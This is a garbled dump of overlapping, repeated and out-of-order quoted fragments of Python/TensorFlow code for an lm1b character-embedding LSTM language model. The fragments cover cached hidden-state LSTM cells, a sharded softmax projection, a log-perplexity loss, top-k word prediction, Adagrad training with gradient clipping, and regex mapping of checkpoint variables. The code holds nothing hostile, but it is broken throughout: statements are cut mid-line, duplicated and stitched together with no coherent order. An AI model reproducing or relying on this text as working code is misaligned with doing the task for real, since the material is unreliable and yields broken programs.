\"lstm/lstm_\" SOFTMAX_SCOPE = \"softmax\" def attach_inference_nodes(input_seqs, hparams=None): \"\"\" Predict", "of inference nodes \"\"\" with tf.variable_scope(CHAR_EMBEDDING_SCOPE): word_embeddings = 
char_embedding_nodes.attach_char_embedding_nodes(input_seqs, num_shards=NUM_SHARDS, hparams=hparams) word_embeddings =", "< x.op.name.find(\"lstm\"), all_gradients) non_lstm_gradients = set(all_gradients).difference(lstm_gradients) lstm_gradients, global_norm = tf.clip_by_global_norm(lstm_gradients, hparams.lstm_clip_grad_norm) all_gradients =", "out the most likely words :param logits: :param id_to_word_lookup_table: :param k: :param hparams:", "hparams=hparams) cell_state_all_layers.append(cell_state) cell_out_all_layers.append(cell_out) lstm_outputs = tf.reshape(cell_out, shape=(-1, hparams.word_embedding_size)) with tf.variable_scope(SOFTMAX_SCOPE): logits, softmax =", "character encoded words :param hparams: :return: dict of inference nodes \"\"\" with tf.variable_scope(CHAR_EMBEDDING_SCOPE):", "tf.get_variable('b', shape=(hparams.vocab_size)) logits = tf.nn.bias_add(tf.matmul(input, softmax_w, transpose_b=True), softmax_b, data_format=\"NHWC\") softmax = tf.nn.softmax(logits) return", "GPU support to trainer # todo: reset lstm hidden state for inference #", "progress... 
:param loss: :param hparams: :return: \"\"\" trainable_vars = tf.trainable_variables() tf.get_collection(tf.GraphKeys.MODEL_VARIABLES, scope=\"\") tf.global_variables()", "id_to_word_lookup_table, k=5, hparams=None): \"\"\" Helper to pull out the most likely words :param", "tf.assign(state_c, state_0[0]) ass_h = tf.assign(state_h, state_0[1]) with tf.control_dependencies([ass_c, ass_h]): out_0 = tf.identity(out_0) return", "word_count, \"cross_entropy\": cross_entropy} CHAR_EMBEDDING_SCOPE = \"char_embedding\" LSTM_SCOPE_PREFIX = \"lstm/lstm_\" SOFTMAX_SCOPE = \"softmax\" def", "tensor of character encoded words :param hparams: :return: dict of inference nodes \"\"\"", "match.group( 2).upper() + \"_diag\", } for r_match, r_replace in var_map_regexes.items(): matching_variables = filter(lambda", "num_shards=NUM_SHARDS, concat_dim=1) softmax_w = tf.reshape(softmax_w, shape=(-1, hparams.word_embedding_size)) softmax_b = tf.get_variable('b', shape=(hparams.vocab_size)) logits =", "see: https://r2rt.com/non-zero-initial-states-for-recurrent-neural-networks.html see: https://stackoverflow.com/questions/37969065/tensorflow-best-way-to-save-state-in-rnns :param input: tensor of word embeddings :param hparams: :return:", "= word_embeddings cell_state_all_layers = [] cell_out_all_layers = [] for layer_num in range(0, 2):", ":param hparams: :return: lstm output and state \"\"\" # LSTM with cached /", "\"\"\" :param logits: :param targets: :param target_weights: :param hparams: :return: \"\"\" target_list =", "tf.nn.sparse_softmax_cross_entropy_with_logits(logits=logits, labels=target_list) cross_entropy = tf.multiply(cross_entropy, tf.to_float(target_weights)) return {\"log_perplexity\": tf.reduce_sum(cross_entropy) / word_count, \"cross_entropy\": cross_entropy}", "return { \"word_embeddings\": word_embeddings, \"lstm_outputs\": lstm_outputs, \"lstm_state\": cell_state, \"logits\": logits, \"softmax\": softmax, \"cell_state_all_layers\":", "hparams=None): \"\"\" Predict next 
word for each sequence / timestep in input_seqs :param", "word_predictions = tf.reshape(id_to_word_lookup_table.lookup(tf.to_int64(tf.reshape(top_word_ids, [-1]))), [-1, k]) return {\"predicted_words\": word_predictions, \"top_k\": top_k} def attach_training_nodes(loss,", "(x.op.name, x), char_embedding_vars))) # Map lstm embedding vars var_map_regexes = {r\"^(\" + LSTM_SCOPE_PREFIX", "hparams.lstm_clip_grad_norm) all_gradients = non_lstm_gradients.union(lstm_gradients) optimizer = tf.train.AdagradOptimizer(hparams.learning_rate) global_step = tf.Variable(0, name='global_step', trainable=False) train_op", "tf.clip_by_global_norm(lstm_gradients, hparams.lstm_clip_grad_norm) all_gradients = non_lstm_gradients.union(lstm_gradients) optimizer = tf.train.AdagradOptimizer(hparams.learning_rate) global_step = tf.Variable(0, name='global_step', trainable=False)", ":return: dict of inference nodes \"\"\" with tf.variable_scope(CHAR_EMBEDDING_SCOPE): word_embeddings = char_embedding_nodes.attach_char_embedding_nodes(input_seqs, num_shards=NUM_SHARDS, hparams=hparams)", "todo: reset lstm hidden state for inference # todo: cleanup batch_sizing inconsistencies import", "= cell(input, tf.nn.rnn_cell.LSTMStateTuple(state_c, state_h)) ass_c = tf.assign(state_c, state_0[0]) ass_h = tf.assign(state_h, state_0[1]) with", "= merge(var_map, dict(map(lambda x: (x.op.name, x), char_embedding_vars))) # Map lstm embedding vars var_map_regexes", "= [] cell_out_all_layers = [] for layer_num in range(0, 2): with tf.variable_scope(LSTM_SCOPE_PREFIX +", "/ timestep in input_seqs :param input_seqs: tensor of character encoded words :param hparams:", "layer_num in range(0, 2): with tf.variable_scope(LSTM_SCOPE_PREFIX + str(layer_num)): cell_out, cell_state = _attach_cached_lstm_nodes(cell_out, hparams=hparams)", "lstm_vars, softmax_vars): var_map = {} # Map char embedding vars var_map = merge(var_map,", "lm1b.utils.model import sharded_linear, create_sharded_weights NUM_SHARDS = 8 def 
_attach_cached_lstm_nodes(input, hparams=None): \"\"\" LSTM with", "/ word_count, \"cross_entropy\": cross_entropy} CHAR_EMBEDDING_SCOPE = \"char_embedding\" LSTM_SCOPE_PREFIX = \"lstm/lstm_\" SOFTMAX_SCOPE = \"softmax\"", "ass_h]): out_0 = tf.identity(out_0) return out_0, state_0 def _attach_projection_nodes(input, hparams=None): \"\"\" Project LSTM", "tf.to_float(target_weights)) return {\"log_perplexity\": tf.reduce_sum(cross_entropy) / word_count, \"cross_entropy\": cross_entropy} CHAR_EMBEDDING_SCOPE = \"char_embedding\" LSTM_SCOPE_PREFIX =", "global_step} def restore_original_lm1b(sess, run_config): \"\"\" Var mapping shenanigans to restore the pre-trained model", "2): with tf.variable_scope(LSTM_SCOPE_PREFIX + str(layer_num)): cell_out, cell_state = _attach_cached_lstm_nodes(cell_out, hparams=hparams) cell_state_all_layers.append(cell_state) cell_out_all_layers.append(cell_out) lstm_outputs", "id_to_word_lookup_table: :param k: :param hparams: :return: \"\"\" top_k = tf.nn.top_k(logits, k) top_word_ids =", "char embedding vars var_map = merge(var_map, dict(map(lambda x: (x.op.name, x), char_embedding_vars))) # Map", "NUM_SHARDS = 8 def _attach_cached_lstm_nodes(input, hparams=None): \"\"\" LSTM with cached / preserved hidden", "/ preserved hidden state see: https://r2rt.com/non-zero-initial-states-for-recurrent-neural-networks.html see: https://stackoverflow.com/questions/37969065/tensorflow-best-way-to-save-state-in-rnns :param input: tensor of word", "logits: :param targets: :param target_weights: :param hparams: :return: \"\"\" target_list = tf.reshape(targets, [-1])", "Attach nodes for training. Work in progress... 
:param loss: :param hparams: :return: \"\"\"", "word_count = tf.add(tf.reduce_sum(target_weights_list), 0.0000999999974738) cross_entropy = tf.nn.sparse_softmax_cross_entropy_with_logits(logits=logits, labels=target_list) cross_entropy = tf.multiply(cross_entropy, tf.to_float(target_weights)) return", "hparams.sequence_length, 8192), initializer=tf.zeros_initializer, trainable=False) state_h = tf.get_variable(name=\"state_h\", shape=(hparams.batch_size * hparams.sequence_length, 1024), initializer=tf.zeros_initializer, trainable=False)", "= tf.reshape(targets, [-1]) target_weights_list = tf.to_float(tf.reshape(target_weights, [-1])) # hrmm word_count = tf.add(tf.reduce_sum(target_weights_list), 0.0000999999974738)", "= tf.nn.bias_add(tf.matmul(input, softmax_w, transpose_b=True), softmax_b, data_format=\"NHWC\") softmax = tf.nn.softmax(logits) return logits, softmax def", "vars var_map = merge(var_map, dict(map(lambda x: (x.op.name, x), char_embedding_vars))) # Map lstm embedding", "Work in progress... 
:param loss: :param hparams: :return: \"\"\" trainable_vars = tf.trainable_variables() tf.get_collection(tf.GraphKeys.MODEL_VARIABLES,", "lstm_outputs = tf.reshape(cell_out, shape=(-1, hparams.word_embedding_size)) with tf.variable_scope(SOFTMAX_SCOPE): logits, softmax = _attach_projection_nodes(lstm_outputs, hparams=hparams) return", "shaped [?,vocab_size] \"\"\" softmax_w = create_sharded_weights((hparams.vocab_size / NUM_SHARDS, hparams.word_embedding_size), num_shards=NUM_SHARDS, concat_dim=1) softmax_w =", "re import os import lm1b.model.char_embedding_nodes as char_embedding_nodes from lm1b.utils.util import merge from lm1b.utils.model", "softmax def _attach_log_perplexity_nodes(logits, targets, target_weights, hparams=None): \"\"\" :param logits: :param targets: :param target_weights:", "use_peepholes=True) state_c = tf.get_variable(name=\"state_c\", shape=(hparams.batch_size * hparams.sequence_length, 8192), initializer=tf.zeros_initializer, trainable=False) state_h = tf.get_variable(name=\"state_h\",", "= char_embedding_nodes.attach_char_embedding_nodes(input_seqs, num_shards=NUM_SHARDS, hparams=hparams) word_embeddings = tf.reshape(word_embeddings, (-1, hparams.word_embedding_size)) cell_out = word_embeddings cell_state_all_layers", "\"word_embeddings\": word_embeddings, \"lstm_outputs\": lstm_outputs, \"lstm_state\": cell_state, \"logits\": logits, \"softmax\": softmax, \"cell_state_all_layers\": cell_state_all_layers, \"cell_out_all_layers\":", "all_gradients) non_lstm_gradients = set(all_gradients).difference(lstm_gradients) lstm_gradients, global_norm = tf.clip_by_global_norm(lstm_gradients, hparams.lstm_clip_grad_norm) all_gradients = non_lstm_gradients.union(lstm_gradients) optimizer", "hparams.sequence_length, 1024), initializer=tf.zeros_initializer, trainable=False) out_0, state_0 = cell(input, tf.nn.rnn_cell.LSTMStateTuple(state_c, state_h)) ass_c = tf.assign(state_c,", "tf.identity(out_0) return out_0, state_0 def _attach_projection_nodes(input, 
hparams=None): \"\"\" Project LSTM outputs to sparse", "= tf.get_variable(name=\"state_h\", shape=(hparams.batch_size * hparams.sequence_length, 1024), initializer=tf.zeros_initializer, trainable=False) out_0, state_0 = cell(input, tf.nn.rnn_cell.LSTMStateTuple(state_c,", "of word embeddings :param hparams: :return: lstm output and state \"\"\" # LSTM", "= tf.reshape(cell_out, shape=(-1, hparams.word_embedding_size)) with tf.variable_scope(SOFTMAX_SCOPE): logits, softmax = _attach_projection_nodes(lstm_outputs, hparams=hparams) return {", "all_gradients = tf.gradients(loss, trainable_vars) lstm_gradients = filter(lambda x: -1 < x.op.name.find(\"lstm\"), all_gradients) non_lstm_gradients", "v # Map softmax embedding vars var_map = merge(var_map, dict(map(lambda x: (x.op.name, x),", "sparse vectors / word predictions :param input: lstm outputs :param hparams: :return: tensor", "+ str(layer_num)): cell_out, cell_state = _attach_cached_lstm_nodes(cell_out, hparams=hparams) cell_state_all_layers.append(cell_state) cell_out_all_layers.append(cell_out) lstm_outputs = tf.reshape(cell_out, shape=(-1,", "https://stackoverflow.com/questions/37969065/tensorflow-best-way-to-save-state-in-rnns :param input: tensor of word embeddings :param hparams: :return: lstm output and", "tf.variable_scope(CHAR_EMBEDDING_SCOPE): word_embeddings = char_embedding_nodes.attach_char_embedding_nodes(input_seqs, num_shards=NUM_SHARDS, hparams=hparams) word_embeddings = tf.reshape(word_embeddings, (-1, hparams.word_embedding_size)) cell_out =", "{r\"^(\" + LSTM_SCOPE_PREFIX + \"\\d)/lstm_cell/projection/kernel/part_(\\d).*\": r\"\\1/W_P_\\2\", r\"^(\" + LSTM_SCOPE_PREFIX + \"\\d)/lstm_cell/kernel/part_(\\d).*\": r\"\\1/W_\\2\", r\"^(\"", "state see: https://r2rt.com/non-zero-initial-states-for-recurrent-neural-networks.html see: https://stackoverflow.com/questions/37969065/tensorflow-best-way-to-save-state-in-rnns :param input: tensor of word embeddings :param hparams:", "match.group(1) + \"/W_\" + 
match.group( 2).upper() + \"_diag\", } for r_match, r_replace in", "hparams=None): \"\"\" LSTM with cached / preserved hidden state see: https://r2rt.com/non-zero-initial-states-for-recurrent-neural-networks.html see: https://stackoverflow.com/questions/37969065/tensorflow-best-way-to-save-state-in-rnns", "target_list = tf.reshape(targets, [-1]) target_weights_list = tf.to_float(tf.reshape(target_weights, [-1])) # hrmm word_count = tf.add(tf.reduce_sum(target_weights_list),", "to trainer # todo: reset lstm hidden state for inference # todo: cleanup", "{\"predicted_words\": word_predictions, \"top_k\": top_k} def attach_training_nodes(loss, hparams=None): \"\"\" Attach nodes for training. Work", "} for r_match, r_replace in var_map_regexes.items(): matching_variables = filter(lambda x: re.match(r_match, x.name), lstm_vars)", "def _attach_projection_nodes(input, hparams=None): \"\"\" Project LSTM outputs to sparse vectors / word predictions", "hparams: :return: \"\"\" top_k = tf.nn.top_k(logits, k) top_word_ids = top_k.indices word_predictions = tf.reshape(id_to_word_lookup_table.lookup(tf.to_int64(tf.reshape(top_word_ids,", "x.name), lstm_vars) for v in matching_variables: var_map[re.sub(r_match, r_replace, v.name)] = v # Map", "all_gradients = non_lstm_gradients.union(lstm_gradients) optimizer = tf.train.AdagradOptimizer(hparams.learning_rate) global_step = tf.Variable(0, name='global_step', trainable=False) train_op =", "out_0, state_0 def _attach_projection_nodes(input, hparams=None): \"\"\" Project LSTM outputs to sparse vectors /", "name='global_step', trainable=False) train_op = optimizer.apply_gradients(zip(all_gradients, trainable_vars), global_step=global_step) return {\"train_op\": train_op, \"global_step\": global_step} def", "hparams: :return: \"\"\" trainable_vars = tf.trainable_variables() tf.get_collection(tf.GraphKeys.MODEL_VARIABLES, scope=\"\") tf.global_variables() all_gradients = tf.gradients(loss, trainable_vars)", "cached / preserved hidden 
state see: https://r2rt.com/non-zero-initial-states-for-recurrent-neural-networks.html see: https://stackoverflow.com/questions/37969065/tensorflow-best-way-to-save-state-in-rnns :param input: tensor of", "lm1b.utils.util import merge from lm1b.utils.model import sharded_linear, create_sharded_weights NUM_SHARDS = 8 def _attach_cached_lstm_nodes(input,", "word for each sequence / timestep in input_seqs :param input_seqs: tensor of character", "hparams=None): \"\"\" Helper to pull out the most likely words :param logits: :param", "graph :param sess: :param run_config: :return: \"\"\" def create_lm1b_restoration_var_map(char_embedding_vars, lstm_vars, softmax_vars): var_map =", "= set(all_gradients).difference(lstm_gradients) lstm_gradients, global_norm = tf.clip_by_global_norm(lstm_gradients, hparams.lstm_clip_grad_norm) all_gradients = non_lstm_gradients.union(lstm_gradients) optimizer = tf.train.AdagradOptimizer(hparams.learning_rate)", "= \"lstm/lstm_\" SOFTMAX_SCOPE = \"softmax\" def attach_inference_nodes(input_seqs, hparams=None): \"\"\" Predict next word for", "word_predictions, \"top_k\": top_k} def attach_training_nodes(loss, hparams=None): \"\"\" Attach nodes for training. 
Work in", "r\"^(\" + LSTM_SCOPE_PREFIX + \"\\d)/lstm_cell/w_([fio])_diag.*\": lambda match: match.group(1) + \"/W_\" + match.group( 2).upper()", "with tf.variable_scope(CHAR_EMBEDDING_SCOPE): word_embeddings = char_embedding_nodes.attach_char_embedding_nodes(input_seqs, num_shards=NUM_SHARDS, hparams=hparams) word_embeddings = tf.reshape(word_embeddings, (-1, hparams.word_embedding_size)) cell_out", "to restore the pre-trained model to the current graph :param sess: :param run_config:", "+ \"\\d)/lstm_cell/projection/kernel/part_(\\d).*\": r\"\\1/W_P_\\2\", r\"^(\" + LSTM_SCOPE_PREFIX + \"\\d)/lstm_cell/kernel/part_(\\d).*\": r\"\\1/W_\\2\", r\"^(\" + LSTM_SCOPE_PREFIX +", "non_lstm_gradients.union(lstm_gradients) optimizer = tf.train.AdagradOptimizer(hparams.learning_rate) global_step = tf.Variable(0, name='global_step', trainable=False) train_op = optimizer.apply_gradients(zip(all_gradients, trainable_vars),", "return {\"predicted_words\": word_predictions, \"top_k\": top_k} def attach_training_nodes(loss, hparams=None): \"\"\" Attach nodes for training.", "tf.gradients(loss, trainable_vars) lstm_gradients = filter(lambda x: -1 < x.op.name.find(\"lstm\"), all_gradients) non_lstm_gradients = set(all_gradients).difference(lstm_gradients)", "to the current graph :param sess: :param run_config: :return: \"\"\" def create_lm1b_restoration_var_map(char_embedding_vars, lstm_vars,", "\"cell_state_all_layers\": cell_state_all_layers, \"cell_out_all_layers\": cell_out_all_layers } def attach_predicted_word_nodes(logits, id_to_word_lookup_table, k=5, hparams=None): \"\"\" Helper to", "# hrmm word_count = tf.add(tf.reduce_sum(target_weights_list), 0.0000999999974738) cross_entropy = tf.nn.sparse_softmax_cross_entropy_with_logits(logits=logits, labels=target_list) cross_entropy = tf.multiply(cross_entropy,", "for inference # todo: cleanup batch_sizing inconsistencies import tensorflow as tf import re", "training. Work in progress... 
:param loss: :param hparams: :return: \"\"\" trainable_vars = tf.trainable_variables()", "= tf.Variable(0, name='global_step', trainable=False) train_op = optimizer.apply_gradients(zip(all_gradients, trainable_vars), global_step=global_step) return {\"train_op\": train_op, \"global_step\":", "in input_seqs :param input_seqs: tensor of character encoded words :param hparams: :return: dict", "in range(0, 2): with tf.variable_scope(LSTM_SCOPE_PREFIX + str(layer_num)): cell_out, cell_state = _attach_cached_lstm_nodes(cell_out, hparams=hparams) cell_state_all_layers.append(cell_state)", "str(layer_num)): cell_out, cell_state = _attach_cached_lstm_nodes(cell_out, hparams=hparams) cell_state_all_layers.append(cell_state) cell_out_all_layers.append(cell_out) lstm_outputs = tf.reshape(cell_out, shape=(-1, hparams.word_embedding_size))", "target_weights: :param hparams: :return: \"\"\" target_list = tf.reshape(targets, [-1]) target_weights_list = tf.to_float(tf.reshape(target_weights, [-1]))", "\"/W_\" + match.group( 2).upper() + \"_diag\", } for r_match, r_replace in var_map_regexes.items(): matching_variables", "\"lstm_state\": cell_state, \"logits\": logits, \"softmax\": softmax, \"cell_state_all_layers\": cell_state_all_layers, \"cell_out_all_layers\": cell_out_all_layers } def attach_predicted_word_nodes(logits,", "r\"^(\" + LSTM_SCOPE_PREFIX + \"\\d)/lstm_cell/kernel/part_(\\d).*\": r\"\\1/W_\\2\", r\"^(\" + LSTM_SCOPE_PREFIX + \"\\d)/lstm_cell/bias.*\": r\"\\1/B\", r\"^(\"", "v.name)] = v # Map softmax embedding vars var_map = merge(var_map, dict(map(lambda x:", "words :param hparams: :return: dict of inference nodes \"\"\" with tf.variable_scope(CHAR_EMBEDDING_SCOPE): word_embeddings =", "\"lstm/lstm_\" SOFTMAX_SCOPE = \"softmax\" def attach_inference_nodes(input_seqs, hparams=None): \"\"\" Predict next word for each", "= v # Map softmax embedding vars var_map = merge(var_map, dict(map(lambda x: (x.op.name,", "with tf.control_dependencies([ass_c, ass_h]): out_0 = 
tf.identity(out_0) return out_0, state_0 def _attach_projection_nodes(input, hparams=None): \"\"\"", ":param input_seqs: tensor of character encoded words :param hparams: :return: dict of inference", "_attach_projection_nodes(input, hparams=None): \"\"\" Project LSTM outputs to sparse vectors / word predictions :param", "var_map = merge(var_map, dict(map(lambda x: (x.op.name, x), char_embedding_vars))) # Map lstm embedding vars", "global_norm = tf.clip_by_global_norm(lstm_gradients, hparams.lstm_clip_grad_norm) all_gradients = non_lstm_gradients.union(lstm_gradients) optimizer = tf.train.AdagradOptimizer(hparams.learning_rate) global_step = tf.Variable(0,", "state_c = tf.get_variable(name=\"state_c\", shape=(hparams.batch_size * hparams.sequence_length, 8192), initializer=tf.zeros_initializer, trainable=False) state_h = tf.get_variable(name=\"state_h\", shape=(hparams.batch_size", ":param targets: :param target_weights: :param hparams: :return: \"\"\" target_list = tf.reshape(targets, [-1]) target_weights_list", "cell_state = _attach_cached_lstm_nodes(cell_out, hparams=hparams) cell_state_all_layers.append(cell_state) cell_out_all_layers.append(cell_out) lstm_outputs = tf.reshape(cell_out, shape=(-1, hparams.word_embedding_size)) with tf.variable_scope(SOFTMAX_SCOPE):", "def restore_original_lm1b(sess, run_config): \"\"\" Var mapping shenanigans to restore the pre-trained model to", "def create_lm1b_restoration_var_map(char_embedding_vars, lstm_vars, softmax_vars): var_map = {} # Map char embedding vars var_map", "softmax_b = tf.get_variable('b', shape=(hparams.vocab_size)) logits = tf.nn.bias_add(tf.matmul(input, softmax_w, transpose_b=True), softmax_b, data_format=\"NHWC\") softmax =", "tensor of word embeddings :param hparams: :return: lstm output and state \"\"\" #", "cleanup batch_sizing inconsistencies import tensorflow as tf import re import os import lm1b.model.char_embedding_nodes", "= tf.clip_by_global_norm(lstm_gradients, hparams.lstm_clip_grad_norm) 
all_gradients = non_lstm_gradients.union(lstm_gradients) optimizer = tf.train.AdagradOptimizer(hparams.learning_rate) global_step = tf.Variable(0, name='global_step',", "with tf.variable_scope(LSTM_SCOPE_PREFIX + str(layer_num)): cell_out, cell_state = _attach_cached_lstm_nodes(cell_out, hparams=hparams) cell_state_all_layers.append(cell_state) cell_out_all_layers.append(cell_out) lstm_outputs =", "r\"\\1/W_P_\\2\", r\"^(\" + LSTM_SCOPE_PREFIX + \"\\d)/lstm_cell/kernel/part_(\\d).*\": r\"\\1/W_\\2\", r\"^(\" + LSTM_SCOPE_PREFIX + \"\\d)/lstm_cell/bias.*\": r\"\\1/B\",", "v in matching_variables: var_map[re.sub(r_match, r_replace, v.name)] = v # Map softmax embedding vars", "import merge from lm1b.utils.model import sharded_linear, create_sharded_weights NUM_SHARDS = 8 def _attach_cached_lstm_nodes(input, hparams=None):", "= top_k.indices word_predictions = tf.reshape(id_to_word_lookup_table.lookup(tf.to_int64(tf.reshape(top_word_ids, [-1]))), [-1, k]) return {\"predicted_words\": word_predictions, \"top_k\": top_k}", "vars var_map_regexes = {r\"^(\" + LSTM_SCOPE_PREFIX + \"\\d)/lstm_cell/projection/kernel/part_(\\d).*\": r\"\\1/W_P_\\2\", r\"^(\" + LSTM_SCOPE_PREFIX +", "# https://r2rt.com/non-zero-initial-states-for-recurrent-neural-networks.html cell = tf.contrib.rnn.LSTMCell(num_units=NUM_SHARDS * hparams.word_embedding_size, num_proj=hparams.word_embedding_size, num_unit_shards=NUM_SHARDS, num_proj_shards=NUM_SHARDS, forget_bias=1.0, use_peepholes=True) state_c", "input: lstm outputs :param hparams: :return: tensor shaped [?,vocab_size] \"\"\" softmax_w = create_sharded_weights((hparams.vocab_size", "= tf.contrib.rnn.LSTMCell(num_units=NUM_SHARDS * hparams.word_embedding_size, num_proj=hparams.word_embedding_size, num_unit_shards=NUM_SHARDS, num_proj_shards=NUM_SHARDS, forget_bias=1.0, use_peepholes=True) state_c = tf.get_variable(name=\"state_c\", shape=(hparams.batch_size", "state_0[0]) ass_h = tf.assign(state_h, state_0[1]) with 
tf.control_dependencies([ass_c, ass_h]): out_0 = tf.identity(out_0) return out_0,", "\"\"\" Helper to pull out the most likely words :param logits: :param id_to_word_lookup_table:", "lstm_outputs, \"lstm_state\": cell_state, \"logits\": logits, \"softmax\": softmax, \"cell_state_all_layers\": cell_state_all_layers, \"cell_out_all_layers\": cell_out_all_layers } def", "hparams=hparams) return { \"word_embeddings\": word_embeddings, \"lstm_outputs\": lstm_outputs, \"lstm_state\": cell_state, \"logits\": logits, \"softmax\": softmax,", "sharded_linear, create_sharded_weights NUM_SHARDS = 8 def _attach_cached_lstm_nodes(input, hparams=None): \"\"\" LSTM with cached /", "mapping shenanigans to restore the pre-trained model to the current graph :param sess:", "vars var_map = merge(var_map, dict(map(lambda x: (x.op.name, x), softmax_vars))) return var_map var_map =", "var_map var_map = create_lm1b_restoration_var_map( char_embedding_vars=tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope=CHAR_EMBEDDING_SCOPE), lstm_vars=tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope=LSTM_SCOPE_PREFIX), softmax_vars=tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope=SOFTMAX_SCOPE) ) saver =", "tf.reshape(id_to_word_lookup_table.lookup(tf.to_int64(tf.reshape(top_word_ids, [-1]))), [-1, k]) return {\"predicted_words\": word_predictions, \"top_k\": top_k} def attach_training_nodes(loss, hparams=None): \"\"\"", "return out_0, state_0 def _attach_projection_nodes(input, hparams=None): \"\"\" Project LSTM outputs to sparse vectors", "cell_out = word_embeddings cell_state_all_layers = [] cell_out_all_layers = [] for layer_num in range(0,", "+ LSTM_SCOPE_PREFIX + \"\\d)/lstm_cell/bias.*\": r\"\\1/B\", r\"^(\" + LSTM_SCOPE_PREFIX + \"\\d)/lstm_cell/w_([fio])_diag.*\": lambda match: match.group(1)", "= tf.nn.softmax(logits) return logits, softmax def _attach_log_perplexity_nodes(logits, targets, target_weights, hparams=None): \"\"\" :param logits:", "tf.nn.bias_add(tf.matmul(input, 
softmax_w, transpose_b=True), softmax_b, data_format=\"NHWC\") softmax = tf.nn.softmax(logits) return logits, softmax def _attach_log_perplexity_nodes(logits,", "num_shards=NUM_SHARDS, hparams=hparams) word_embeddings = tf.reshape(word_embeddings, (-1, hparams.word_embedding_size)) cell_out = word_embeddings cell_state_all_layers = []", "[] cell_out_all_layers = [] for layer_num in range(0, 2): with tf.variable_scope(LSTM_SCOPE_PREFIX + str(layer_num)):", "# todo: reset lstm hidden state for inference # todo: cleanup batch_sizing inconsistencies", "tf.assign(state_h, state_0[1]) with tf.control_dependencies([ass_c, ass_h]): out_0 = tf.identity(out_0) return out_0, state_0 def _attach_projection_nodes(input,", "= _attach_cached_lstm_nodes(cell_out, hparams=hparams) cell_state_all_layers.append(cell_state) cell_out_all_layers.append(cell_out) lstm_outputs = tf.reshape(cell_out, shape=(-1, hparams.word_embedding_size)) with tf.variable_scope(SOFTMAX_SCOPE): logits,", "run_config: :return: \"\"\" def create_lm1b_restoration_var_map(char_embedding_vars, lstm_vars, softmax_vars): var_map = {} # Map char", "+ LSTM_SCOPE_PREFIX + \"\\d)/lstm_cell/projection/kernel/part_(\\d).*\": r\"\\1/W_P_\\2\", r\"^(\" + LSTM_SCOPE_PREFIX + \"\\d)/lstm_cell/kernel/part_(\\d).*\": r\"\\1/W_\\2\", r\"^(\" +", "\"\"\" softmax_w = create_sharded_weights((hparams.vocab_size / NUM_SHARDS, hparams.word_embedding_size), num_shards=NUM_SHARDS, concat_dim=1) softmax_w = tf.reshape(softmax_w, shape=(-1,", "shenanigans to restore the pre-trained model to the current graph :param sess: :param", "tf.train.AdagradOptimizer(hparams.learning_rate) global_step = tf.Variable(0, name='global_step', trainable=False) train_op = optimizer.apply_gradients(zip(all_gradients, trainable_vars), global_step=global_step) return {\"train_op\":", "\"logits\": logits, \"softmax\": softmax, \"cell_state_all_layers\": cell_state_all_layers, \"cell_out_all_layers\": cell_out_all_layers } def 
attach_predicted_word_nodes(logits, id_to_word_lookup_table, k=5,", "softmax_w = tf.reshape(softmax_w, shape=(-1, hparams.word_embedding_size)) softmax_b = tf.get_variable('b', shape=(hparams.vocab_size)) logits = tf.nn.bias_add(tf.matmul(input, softmax_w,", "\"\"\" def create_lm1b_restoration_var_map(char_embedding_vars, lstm_vars, softmax_vars): var_map = {} # Map char embedding vars", "+ match.group( 2).upper() + \"_diag\", } for r_match, r_replace in var_map_regexes.items(): matching_variables =", "word_embeddings cell_state_all_layers = [] cell_out_all_layers = [] for layer_num in range(0, 2): with", "char_embedding_vars))) # Map lstm embedding vars var_map_regexes = {r\"^(\" + LSTM_SCOPE_PREFIX + \"\\d)/lstm_cell/projection/kernel/part_(\\d).*\":", "Map lstm embedding vars var_map_regexes = {r\"^(\" + LSTM_SCOPE_PREFIX + \"\\d)/lstm_cell/projection/kernel/part_(\\d).*\": r\"\\1/W_P_\\2\", r\"^(\"", "r\"\\1/B\", r\"^(\" + LSTM_SCOPE_PREFIX + \"\\d)/lstm_cell/w_([fio])_diag.*\": lambda match: match.group(1) + \"/W_\" + match.group(", "hrmm word_count = tf.add(tf.reduce_sum(target_weights_list), 0.0000999999974738) cross_entropy = tf.nn.sparse_softmax_cross_entropy_with_logits(logits=logits, labels=target_list) cross_entropy = tf.multiply(cross_entropy, tf.to_float(target_weights))", "= {} # Map char embedding vars var_map = merge(var_map, dict(map(lambda x: (x.op.name,", "x: re.match(r_match, x.name), lstm_vars) for v in matching_variables: var_map[re.sub(r_match, r_replace, v.name)] = v", "dict(map(lambda x: (x.op.name, x), char_embedding_vars))) # Map lstm embedding vars var_map_regexes = {r\"^(\"", "1024), initializer=tf.zeros_initializer, trainable=False) out_0, state_0 = cell(input, tf.nn.rnn_cell.LSTMStateTuple(state_c, state_h)) ass_c = tf.assign(state_c, state_0[0])", "= 8 def _attach_cached_lstm_nodes(input, hparams=None): \"\"\" LSTM with cached / preserved hidden state", "state_0 = cell(input, tf.nn.rnn_cell.LSTMStateTuple(state_c, state_h)) ass_c = 
tf.assign(state_c, state_0[0]) ass_h = tf.assign(state_h, state_0[1])", "return {\"log_perplexity\": tf.reduce_sum(cross_entropy) / word_count, \"cross_entropy\": cross_entropy} CHAR_EMBEDDING_SCOPE = \"char_embedding\" LSTM_SCOPE_PREFIX = \"lstm/lstm_\"", "var_map = create_lm1b_restoration_var_map( char_embedding_vars=tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope=CHAR_EMBEDDING_SCOPE), lstm_vars=tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope=LSTM_SCOPE_PREFIX), softmax_vars=tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope=SOFTMAX_SCOPE) ) saver = tf.train.Saver(var_list=var_map)", "for layer_num in range(0, 2): with tf.variable_scope(LSTM_SCOPE_PREFIX + str(layer_num)): cell_out, cell_state = _attach_cached_lstm_nodes(cell_out,", "logits = tf.nn.bias_add(tf.matmul(input, softmax_w, transpose_b=True), softmax_b, data_format=\"NHWC\") softmax = tf.nn.softmax(logits) return logits, softmax", "= _attach_projection_nodes(lstm_outputs, hparams=hparams) return { \"word_embeddings\": word_embeddings, \"lstm_outputs\": lstm_outputs, \"lstm_state\": cell_state, \"logits\": logits,", "_attach_cached_lstm_nodes(cell_out, hparams=hparams) cell_state_all_layers.append(cell_state) cell_out_all_layers.append(cell_out) lstm_outputs = tf.reshape(cell_out, shape=(-1, hparams.word_embedding_size)) with tf.variable_scope(SOFTMAX_SCOPE): logits, softmax", "trainer # todo: add GPU support to trainer # todo: reset lstm hidden", "trainable_vars) 